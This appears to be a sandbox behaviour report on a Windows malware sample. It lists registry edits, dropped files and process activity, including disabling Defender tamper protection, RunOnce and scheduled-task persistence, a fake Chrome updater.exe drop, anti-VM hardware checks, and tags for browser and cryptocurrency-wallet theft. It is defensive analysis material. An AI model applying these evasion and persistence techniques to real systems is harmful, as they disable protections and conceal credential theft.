N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\62CC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bvtrhjj N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
